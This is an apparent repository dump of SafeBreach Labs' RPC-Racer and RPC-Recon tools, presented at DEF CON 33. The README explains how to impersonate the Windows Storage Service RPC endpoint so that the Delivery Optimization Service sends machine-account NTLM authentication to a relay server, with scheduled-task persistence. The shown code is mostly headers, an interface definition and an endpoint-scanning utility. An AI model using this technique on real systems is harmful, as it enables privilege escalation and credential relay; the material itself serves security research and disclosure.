├── .gitignore ├── images └── RPC-Racer.png ├── RPC-Lib ├── RPC-Lib.vcxproj.user ├── Utils.h ├── RPC-Lib.vcxproj.filters ├── RPC-Lib.vcxproj └── Utils.cpp ├── RPC-Racer ├── RPC-Racer.vcxproj.user ├── RPC-Racer.h ├── RPC-Racer.vcxproj.filters ├── StorSvc.idl ├── StorSvc_h.h ├── RPC-Racer.vcxproj └── RPC-Racer.cpp ├── RPC-Recon ├── RPC-Recon.vcxproj.user ├── RPC-Recon.h ├── QueryEPM.h ├── RPC-Recon.vcxproj.filters ├── QueryEPM.cpp ├── RPC-Recon.cpp ├── QueryProcesses.h ├── RPC-Recon.vcxproj ├── QueryProcesses.cpp └── GuidMaps.h ├── LICENSE ├── README.md └── RPC-Racer.sln /.gitignore: -------------------------------------------------------------------------------- 1 | .vs/ 2 | 3 | Debug/ 4 | 5 | Release/ 6 | 7 | x64/ -------------------------------------------------------------------------------- /images/RPC-Racer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/RPC-Racer/HEAD/images/RPC-Racer.png -------------------------------------------------------------------------------- /RPC-Lib/RPC-Lib.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /RPC-Racer/RPC-Racer.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /RPC-Recon/RPC-Recon.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /RPC-Recon/RPC-Recon.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "QueryEPM.h" 3 | #include "QueryProcesses.h" 4 | #include 5 | 6 | wstring TASK_NAME = L"RPC-Recon"; 7 | const DWORD MILISECOND = 1; 8 | const DWORD SECOND = MILISECOND * 1000; 9 | const DWORD MINUTE = 60 * SECOND; 10 | DWORD g_SleepTime = 5 * MINUTE; -------------------------------------------------------------------------------- /RPC-Recon/QueryEPM.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "RPC-Lib/Utils.h" 3 | #include 4 | #include 5 | 6 | using std::map; 7 | using std::vector; 8 | using std::wstringstream; 9 | 10 | void QueryEpm(map>& IfMap); 11 | void CompareEpmResults(map>& EpmEarly, map>& EpmLate, wstringstream& OutStream); -------------------------------------------------------------------------------- /RPC-Lib/Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | using std::endl; 12 | using std::cout; 13 | using std::wcout; 14 | using std::runtime_error; 15 | using std::wstring; 16 | using std::string; 17 | 18 | string TranslateCode(DWORD ErrorCode); 19 | void ThrowException(const char* Message, const DWORD ErrorCode); 20 | wstring IfIdToWstring(const RPC_IF_ID* IfID); 21 | wstring UuidToWstring(const UUID* Uuid); 22 | wstring BindHandleToWstring(RPC_BINDING_HANDLE Handle); 23 | wstring GetServiceNameFromPid(DWORD Pid); 24 | void SidToUsername(PSID Sid, wstring& Username, wstring& SidString); 25 | void GetSidAndUsername(HANDLE Token, wstring& SidStr, wstring& UsernameStr); 26 | void RegisterScheduledTask(wstring& TaskName, wstring& Argument, bool HighestPrivileges); -------------------------------------------------------------------------------- /RPC-Lib/RPC-Lib.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /RPC-Racer/RPC-Racer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "RPC-Lib/Utils.h" 3 | #include 4 | #include 5 | #include 6 | #include "StorSvc_h.h" 7 | 8 | using std::stringstream; 9 | 10 | #define PROTSEC L"ncalrpc" 11 | wstring g_RemoteServer; 12 | RPC_IF_HANDLE INTERFACES[] = { StorSvc_v0_0_s_ifspec }; 13 | const wstring ORIGINAL_RPC_SERVICE = L"StorSvc"; 14 | const wstring REGISTER_FLAG = L"/register"; 15 | wstring TASK_NAME = L"RPC-Racer"; 16 | 17 | 18 | wstring GetProcFileName(DWORD Pid); 19 | void SidToUsername(PSID Sid, wstring& Username, wstring& SidString); 20 | void LogCallAttributes(RPC_BINDING_HANDLE BindingHandle); 21 | wstring GetImpersonationLevel(HANDLE TokenHandle); 22 | HANDLE GetRpcClientToken(RPC_BINDING_HANDLE BindingHandle); 23 | void GetSidAndUsername(HANDLE ThreadToken, wstring& SidStr, wstring& UsernameStr); 24 | void LogTokenInfo(RPC_BINDING_HANDLE BindingHandle); 25 | void LogConnectionInfo(RPC_BINDING_HANDLE BindingHandle); 26 | RPC_STATUS RpcIfCallbackFn(RPC_IF_HANDLE InterfaceUuid, void* Context); 27 | void RegisterServer(RPC_IF_HANDLE Interface, wchar_t* Protseq, wchar_t* Endpoint, wchar_t* Annotation); 28 | void TriggerCreateJob(LPCWSTR JobName); 29 | void QueryStatusService(const wstring& ServiceName); -------------------------------------------------------------------------------- /RPC-Racer/RPC-Racer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | 31 | 32 | Source Files 33 | 34 | 35 | Source Files 36 | 37 | 38 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2025, SafeBreach Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /RPC-Recon/RPC-Recon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # RPC-Racer 3 |

4 |

5 |

6 | 7 | This tool is used to masquerade as a legitimate, built-in RPC server of the operating system without administrator privileges. 8 | It mimics the RPC interface of the Storage Service (StorSvc.dll) and forces the Delivery Optimization Service (dosvc.dll) to send an RPC request to it. The response sent by RPC-Racer contains a path that will be accessed by DoSvc. By specifying a network share as the path, an NTLM authentication of the machine account will be triggered. This authentication can then be relayed to leverage the privileges of the machine account. 9 | 10 | This attack will succeed only if the Storage Service is turned off. To execute the tool before this service is launched, the parameter `/register` should be specified for RPC-Racer. It will make the tool create a scheduled task that will start when the current user logs on. After the machine reboots and the user logs on again, RPC-Racer will be executed automatically with the IP address specified upon registration. 11 | 12 | Additional technical information is available on the [SafeBreach blog](https://www.safebreach.com/blog/you-snooze-you-lose-winning-rpc-endpoints/) 13 | 14 | Presented at DEF CON 33 - [You snooze you lose: RPC-Racer winning RPC endpoints against services](https://defcon.org/html/defcon-33/dc-33-speakers.html#content_60313) 15 | 16 | ## Usage 17 | ``` 18 | RPC-Racer.exe RELAY_SERVER_IP_ADDRESS [/register] 19 | ``` 20 | 21 | ## Notes 22 | - In cases where the Storage Service is launched before the scheduled task of RPC-Racer, the following setting should be turned on: Windows Update -> Advanced Options -> Delivery Optimization -> Allow downloads from other devices 23 | 24 | # RPC-Recon 25 | This tool is used to find vulnerable interfaces that can be registered by an attacker right after the system boots, before most services are launched. It queries the Endpoint Mapper for all the dynamic endpoints registered and scans the memory of processes to find well-known endpoints. Then, it waits and performs the same retrieval again to find RPC servers that are registered late. When the RPC-Recon is done, a text file will be created with all interfaces that can be registered before the original service. 26 | 27 | To create a scheduled task that will execute RPC-Recon when the current user logs on, specify the parameter `/register`. 28 | 29 | ## Usage 30 | ``` 31 | RPC-Recon.exe [/register] 32 | ``` 33 | 34 | ## Notes 35 | - RPC-Recon needs to read the memory of elevated processes. Therefore, it should be executed with administrator privileges. 36 | 37 | ## Credits 38 | * [Ron Ben Yizhak](https://x.com/RonB_Y) 39 | 40 | ## References 41 | * [RpcView](https://github.com/silverf0x/RpcView) 42 | * [RpcDump](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) -------------------------------------------------------------------------------- /RPC-Recon/QueryEPM.cpp: -------------------------------------------------------------------------------- 1 | #include "QueryEPM.h" 2 | #include "GuidMaps.h" 3 | 4 | // Store all the interfaces registered to the Endpoint Mapper as keys and the endpoints that expose them as values 5 | void QueryEpm(map>& IfMap) 6 | { 7 | // Get inquiry context from the Endpoint Mapper 8 | RPC_EP_INQ_HANDLE inqHandle = nullptr; 9 | RPC_STATUS status = RpcMgmtEpEltInqBegin(nullptr, RPC_C_EP_ALL_ELTS, nullptr, 0, nullptr, &inqHandle); 10 | if (RPC_S_OK != status) 11 | ThrowException("RpcMgmtEpEltInqBegin failed", status); 12 | 13 | while (true) 14 | { 15 | RPC_IF_ID ifId = {}; 16 | RPC_BINDING_HANDLE serverBindingHandle = nullptr; 17 | UUID objectUuid = {}; 18 | RPC_WSTR annotation = nullptr; 19 | 20 | // Enumerate all entries 21 | status = RpcMgmtEpEltInqNextW(inqHandle, &ifId, &serverBindingHandle, &objectUuid, &annotation); 22 | if (RPC_X_NO_MORE_ENTRIES == status) 23 | break; 24 | if (RPC_S_OK != status) 25 | ThrowException("RpcMgmtEpEltInqNextW failed", status); 26 | 27 | // Convert variables to std::wstring 28 | wstring ifUuidStr = IfIdToWstring(&ifId); 29 | ifUuidStr.append(L" "); 30 | ifUuidStr.append(reinterpret_cast(annotation)); 31 | wstring serverBindString = BindHandleToWstring(serverBindingHandle); 32 | RpcBindingFree(&serverBindingHandle); 33 | RpcStringFreeW(&annotation); 34 | 35 | // Check if the interface was alreay stored in the map 36 | map>::iterator it = IfMap.find(ifUuidStr); 37 | if (it == IfMap.end()) 38 | { 39 | // If not, add a new pair 40 | vector bindingsVector = { serverBindString }; 41 | IfMap.insert({ ifUuidStr, bindingsVector }); 42 | } 43 | else 44 | { 45 | // If yes, add to existing vector 46 | it->second.push_back(serverBindString); 47 | } 48 | } 49 | RpcMgmtEpEltInqDone(&inqHandle); 50 | } 51 | 52 | void CompareEpmResults(map>& EpmEarly, map>& EpmLate, wstringstream& OutStream) 53 | { 54 | for (auto const& [uuid, bindingVector] : EpmLate) 55 | { 56 | // skip interfaces that were registered by the first scan 57 | if (EpmEarly.find(uuid) != EpmEarly.end()) 58 | continue; 59 | 60 | // Correlate between UUIDs and known RPC servers 61 | wstring protocol = L"N/A"; 62 | for (const auto& [key, value] : KNOWN_PROTOCOLS) 63 | { 64 | if (uuid.rfind(key) == 0) 65 | { 66 | protocol = value; 67 | break; 68 | } 69 | } 70 | wstring provider = L"N/A"; 71 | for (const auto& [key, value] : KNOWN_UUIDS) 72 | { 73 | if (uuid.rfind(key) == 0) 74 | { 75 | provider = value; 76 | break; 77 | } 78 | } 79 | 80 | // Add the results to the output stream 81 | OutStream << L"Protocol: " << protocol << endl; 82 | OutStream << L"Provider: " << provider << endl; 83 | OutStream << L"UUID : " << uuid << endl; 84 | OutStream << L"Bindings: " << endl; 85 | for (auto const& bindString : bindingVector) 86 | OutStream << L" " << bindString << endl; 87 | OutStream << L"--------------------------------------------" << endl; 88 | } 89 | } -------------------------------------------------------------------------------- /RPC-Racer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.12.35527.113 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RPC-Racer", "RPC-Racer\RPC-Racer.vcxproj", "{240D4C3F-C777-4232-8FD9-69663699A8D8}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6} = {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6} 9 | EndProjectSection 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RPC-Recon", "RPC-Recon\RPC-Recon.vcxproj", "{060D2759-1D6E-493C-97A2-2F743309F285}" 12 | ProjectSection(ProjectDependencies) = postProject 13 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6} = {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6} 14 | EndProjectSection 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RPC-Lib", "RPC-Lib\RPC-Lib.vcxproj", "{048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}" 17 | EndProject 18 | Global 19 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 20 | Debug|x64 = Debug|x64 21 | Debug|x86 = Debug|x86 22 | Release|x64 = Release|x64 23 | Release|x86 = Release|x86 24 | EndGlobalSection 25 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 26 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Debug|x64.ActiveCfg = Debug|x64 27 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Debug|x64.Build.0 = Debug|x64 28 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Debug|x86.ActiveCfg = Debug|Win32 29 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Debug|x86.Build.0 = Debug|Win32 30 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Release|x64.ActiveCfg = Release|x64 31 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Release|x64.Build.0 = Release|x64 32 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Release|x86.ActiveCfg = Release|Win32 33 | {240D4C3F-C777-4232-8FD9-69663699A8D8}.Release|x86.Build.0 = Release|Win32 34 | {060D2759-1D6E-493C-97A2-2F743309F285}.Debug|x64.ActiveCfg = Debug|x64 35 | {060D2759-1D6E-493C-97A2-2F743309F285}.Debug|x64.Build.0 = Debug|x64 36 | {060D2759-1D6E-493C-97A2-2F743309F285}.Debug|x86.ActiveCfg = Debug|Win32 37 | {060D2759-1D6E-493C-97A2-2F743309F285}.Debug|x86.Build.0 = Debug|Win32 38 | {060D2759-1D6E-493C-97A2-2F743309F285}.Release|x64.ActiveCfg = Release|x64 39 | {060D2759-1D6E-493C-97A2-2F743309F285}.Release|x64.Build.0 = Release|x64 40 | {060D2759-1D6E-493C-97A2-2F743309F285}.Release|x86.ActiveCfg = Release|Win32 41 | {060D2759-1D6E-493C-97A2-2F743309F285}.Release|x86.Build.0 = Release|Win32 42 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Debug|x64.ActiveCfg = Debug|x64 43 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Debug|x64.Build.0 = Debug|x64 44 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Debug|x86.ActiveCfg = Debug|Win32 45 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Debug|x86.Build.0 = Debug|Win32 46 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Release|x64.ActiveCfg = Release|x64 47 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Release|x64.Build.0 = Release|x64 48 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Release|x86.ActiveCfg = Release|Win32 49 | {048F0D7D-7A34-4E14-821D-8BCEA4FA7CC6}.Release|x86.Build.0 = Release|Win32 50 | EndGlobalSection 51 | GlobalSection(SolutionProperties) = preSolution 52 | HideSolutionNode = FALSE 53 | EndGlobalSection 54 | EndGlobal 55 | -------------------------------------------------------------------------------- /RPC-Recon/RPC-Recon.cpp: -------------------------------------------------------------------------------- 1 | #include "RPC-Recon.h" 2 | 3 | void PrintHelp() 4 | { 5 | wcout << "usage: RPC-Recon.exe [/register]" << endl; 6 | } 7 | 8 | bool CheckParams(int argc, wchar_t* argv[]) 9 | { 10 | if (argc >= 3) 11 | { 12 | wstring param = argv[1]; 13 | if (!param.compare(L"-h") || !param.compare(L"--help")) 14 | { 15 | PrintHelp(); 16 | return false; 17 | } 18 | else 19 | { 20 | if (!param.compare(L"-s")) 21 | { 22 | int numberOfMinutes = _wtoi(argv[2]); 23 | g_SleepTime = numberOfMinutes * MINUTE; 24 | } 25 | else 26 | { 27 | wcout << L"invalid parameter" << endl; 28 | PrintHelp(); 29 | return false; 30 | } 31 | } 32 | } 33 | return true; 34 | } 35 | 36 | // Create the log file in the same folder as the executable 37 | void LogReconData(wstringstream& DataStream) 38 | { 39 | DWORD size = MAX_PATH; 40 | wchar_t exePath[MAX_PATH] = {}; 41 | QueryFullProcessImageNameW(GetCurrentProcess(), 0, exePath, &size); 42 | wstring exePathStr = exePath; 43 | size_t it = exePathStr.find_last_of(L"\\"); 44 | wstring logPath = exePathStr.substr(0, it); 45 | logPath.append(L"\\RPC-Recon.txt"); 46 | std::wofstream logStream(logPath.c_str(), std::ios::out); 47 | if (logStream.good()) 48 | { 49 | logStream << DataStream.rdbuf(); 50 | logStream.close(); 51 | } 52 | else 53 | { 54 | wcout << L"writing to " << logPath << L" failed" << endl; 55 | } 56 | } 57 | 58 | int wmain(int argc, wchar_t* argv[]) 59 | { 60 | try 61 | { 62 | if (argc > 1) 63 | { 64 | wstring param = argv[1]; 65 | if (!param.compare(L"-h") || !param.compare(L"--help")) 66 | { 67 | PrintHelp(); 68 | return EXIT_SUCCESS; 69 | } 70 | else 71 | { 72 | if (!param.compare(L"/register")) 73 | { 74 | wstring taskArgument; 75 | RegisterScheduledTask(TASK_NAME, taskArgument, true); 76 | return EXIT_SUCCESS; 77 | } 78 | else 79 | { 80 | wcout << L"invalid parameter" << endl; 81 | PrintHelp(); 82 | return EXIT_SUCCESS; 83 | } 84 | } 85 | } 86 | 87 | wstringstream reconStream; 88 | reconStream << L"--------------------------------------------" << endl; 89 | reconStream << L"| EPM Recon Results |" << endl; 90 | reconStream << L"--------------------------------------------" << endl; 91 | 92 | // Gather data on dynamic endpoints 93 | map> epmEarly; 94 | map> epmLate; 95 | QueryEpm(epmEarly); 96 | 97 | // Gather data on well-known endpoints 98 | map>> procsEarly; 99 | map>> procsLate; 100 | QueryProcesses(procsEarly); 101 | wcout << L"First EPM recon found " << epmEarly.size() << L" UUIDs" << endl; 102 | wcout << L"First processes recon found " << procsEarly.size() << L" RPC servers" << endl; 103 | 104 | // Wait for delayed services to start 105 | wcout << L"Sleeping for " << g_SleepTime / MINUTE << L" minutes" << endl; 106 | Sleep(g_SleepTime); 107 | 108 | // Gather data again after the services started 109 | QueryEpm(epmLate); 110 | QueryProcesses(procsLate); 111 | wcout << L"Second EPM recon found " << epmLate.size() << L" UUIDs" << endl; 112 | wcout << L"Second processes recon found " << procsLate.size() << L" RPC servers" << endl; 113 | 114 | // Find which interfaces are registered late 115 | CompareEpmResults(epmEarly, epmLate, reconStream); 116 | reconStream << L"| Processes Recon Results |" << endl; 117 | reconStream << L"--------------------------------------------" << endl; 118 | CompareProcsResults(procsEarly, procsLate, reconStream); 119 | LogReconData(reconStream); 120 | wcout << L"Press enter to exit" << endl; 121 | getchar(); 122 | } 123 | catch (std::exception& ex) 124 | { 125 | cout << ex.what() << endl; 126 | } 127 | catch (...) 128 | { 129 | cout << "Unknown exception occured" << endl; 130 | } 131 | 132 | } -------------------------------------------------------------------------------- /RPC-Racer/StorSvc.idl: -------------------------------------------------------------------------------- 1 | import "wtypesbase.idl"; 2 | 3 | [ 4 | uuid(44D1520B-6133-41F0-8A66-D37305ECC357), 5 | version(0.0), 6 | ] 7 | interface StorSvc 8 | { 9 | typedef enum _STORAGE_DEVICE_TYPE 10 | { 11 | STORAGE_DEVICE_INTERNAL = 0x0, 12 | STORAGE_DEVICE_EXTERNAL = 0x1, 13 | STORAGE_DEVICE_SD = 0x1, 14 | STORAGE_DEVICE_MAX = 0x2, 15 | } STORAGE_DEVICE_TYPE, * PSTORAGE_DEVICE_TYPE; 16 | 17 | typedef enum _STORAGE_SETTING 18 | { 19 | STORAGE_SETTING_CARD_DISABLED = 0x1, 20 | STORAGE_SETTING_WRITE_ACCESS = 0x2, 21 | STORAGE_SETTING_APP_PAIRING_STATUS = 0x3, 22 | } STORAGE_SETTING, * PSTORAGE_SETTING; 23 | 24 | typedef enum _STORAGE_PRESENCE_STATE 25 | { 26 | STORAGE_PRESENCE_MOUNTED = 0x0, 27 | STORAGE_PRESENCE_PREDISMOUNTED = 0x1, 28 | STORAGE_PRESENCE_DISMOUNTED = 0x2, 29 | } STORAGE_PRESENCE_STATE, * PSTORAGE_PRESENCE_STATE; 30 | 31 | typedef enum _STORAGE_DISMOUNT_REASON 32 | { 33 | STORAGE_DISMOUNT_NONE = 0x0, 34 | STORAGE_DISMOUNT_SAFE_REMOVAL = 0x1, 35 | STORAGE_DISMOUNT_SURPRISE_REMOVAL = 0x2, 36 | STORAGE_DISMOUNT_IO_FAILURE = 0x3, 37 | STORAGE_DISMOUNT_BUSY = 0x4, 38 | } STORAGE_DISMOUNT_REASON, * PSTORAGE_DISMOUNT_REASON; 39 | 40 | typedef enum _STORAGE_FREE_SPACE_STATE 41 | { 42 | STORAGE_SPACE_NORMAL = 0x0, 43 | STORAGE_SPACE_LOW = 0x1, 44 | } STORAGE_FREE_SPACE_STATE, * PSTORAGE_FREE_SPACE_STATE; 45 | 46 | typedef enum _STORAGE_TEMP_CLEANUP_STATE 47 | { 48 | STORAGE_TEMP_NORMAL = 0x0, 49 | STORAGE_TEMP_CLEANUP = 0x1, 50 | } STORAGE_TEMP_CLEANUP_STATE, * PSTORAGE_TEMP_CLEANUP_STATE; 51 | 52 | typedef enum _STORAGE_DEVICE_PROPERTIES 53 | { 54 | STORAGE_PROPERTY_NONE = 0x0, 55 | STORAGE_PROPERTY_REMOVABLE = 0x1, 56 | } STORAGE_DEVICE_PROPERTIES, * PSTORAGE_DEVICE_PROPERTIES; 57 | 58 | typedef enum _STORAGE_VOLUME_STATUS 59 | { 60 | STORAGE_STATUS_NORMAL = 0x0, 61 | STORAGE_STATUS_DIRTY = 0x1, 62 | STORAGE_STATUS_UNFORMATTED = 0x2, 63 | STORAGE_STATUS_NEW_CARD = 0x4, 64 | STORAGE_STATUS_DISABLED = 0x8, 65 | STORAGE_STATUS_READ_ONLY = 0x10, 66 | STORAGE_STATUS_WRITE_FAILURE = 0x20, 67 | } STORAGE_VOLUME_STATUS, * PSTORAGE_VOLUME_STATUS; 68 | 69 | typedef enum _STORAGE_APP_PAIRING_STATUS 70 | { 71 | STORAGE_APP_PAIRING_DIFFERENT_DEVICE = 0x1, 72 | STORAGE_APP_PAIRING_SAME_DEVICE = 0x2, 73 | STORAGE_APP_PAIRING_NO_DEVICE = 0x4, 74 | } STORAGE_APP_PAIRING_STATUS, * PSTORAGE_APP_PAIRING_STATUS; 75 | 76 | typedef struct _STORAGE_DEVICE_INFO 77 | { 78 | unsigned int Size; 79 | wchar_t PathName[260]; 80 | STORAGE_DEVICE_PROPERTIES DeviceProperties; 81 | STORAGE_PRESENCE_STATE PresenceState; 82 | STORAGE_DISMOUNT_REASON DismountReason; 83 | STORAGE_VOLUME_STATUS VolumeStatus; 84 | STORAGE_FREE_SPACE_STATE FreeSpaceState; 85 | STORAGE_TEMP_CLEANUP_STATE TempCleanupState; 86 | GUID StorageId; 87 | STORAGE_APP_PAIRING_STATUS AppPairingStatus; 88 | unsigned __int64 ReservedSize; 89 | wchar_t FriendlyName[260]; 90 | unsigned int BusType; 91 | unsigned int FileSystemType; 92 | unsigned int PersistentVolumeState; 93 | } STORAGE_DEVICE_INFO, * PSTORAGE_DEVICE_INFO; 94 | 95 | long SvcMountVolume(); 96 | long SvcDismountVolume(); 97 | long SvcFormatVolume(); 98 | long SvcGetStorageInstanceCount([in] STORAGE_DEVICE_TYPE DeviceType, [out] LPDWORD DevicesCount); 99 | long SvcGetStorageDeviceInfo([in] STORAGE_DEVICE_TYPE DeviceType, [in] DWORD DeviceIndex, [in, out] STORAGE_DEVICE_INFO* DeviceInfo); 100 | long CleanupItem(); 101 | long SvcRebootToFlashingMode(); 102 | long SvcRebootToUosFlashing(); 103 | long SvcFinalizeVolume(); 104 | long SvcGetStorageSettings([in] STORAGE_DEVICE_TYPE DeviceType, [in] DWORD DeviceIndex, [in] STORAGE_SETTING SettingsType, [out] LPDWORD SettingsValue); 105 | long SvcResetStoragePolicySettings(); 106 | long SvcSetStorageSettings(); 107 | long SvcTriggerStorageCleanup(); 108 | long SvcTriggerLowStorageNotification(); 109 | long SvcMoveFileInheritSecurity(); 110 | long SvcScanVolume(); 111 | long SvcProcessStorageCardChange(); 112 | long SvcProvisionForAppInstall(); 113 | long SvcGetStorageInstanceCountForMaps(); 114 | long SvcGetStoragePolicySettings(); 115 | long SvcSetStoragePolicySettings(); 116 | long SvcTriggerStoragePolicies(); 117 | long SvcTriggerStorageOptimization(); 118 | long SvcPredictStorageHealth(); 119 | long SvcGetLastFailedSaveLocationPath(); 120 | long SvcExecuteRemoveUserFiles(); 121 | long SvcExecuteDehydrateUserFiles(); 122 | long SvcGetStorageDeviceSize(); 123 | long SvcGetStoragePolicyDefaultValue(); 124 | long SvcGetStorageDeviceLowDiskState(); 125 | long SvcGetStorageDeviceLowDiskState2(); 126 | long SvcSilentCleanupTaskSetEnabledState(); 127 | long SvcSilentCleanupTaskGetEnabledState(); 128 | long SvcGetStoragePoliciesLastTriggerTime(); 129 | long SvcSetStoragePoliciesLastTriggerTime(); 130 | long SvcGetSmartAttributes(); 131 | } -------------------------------------------------------------------------------- /RPC-Lib/RPC-Lib.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {048f0d7d-7a34-4e14-821d-8bcea4fa7cc6} 25 | RPCLib 26 | 10.0 27 | 28 | 29 | 30 | StaticLibrary 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | StaticLibrary 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | StaticLibrary 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | StaticLibrary 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions) 78 | true 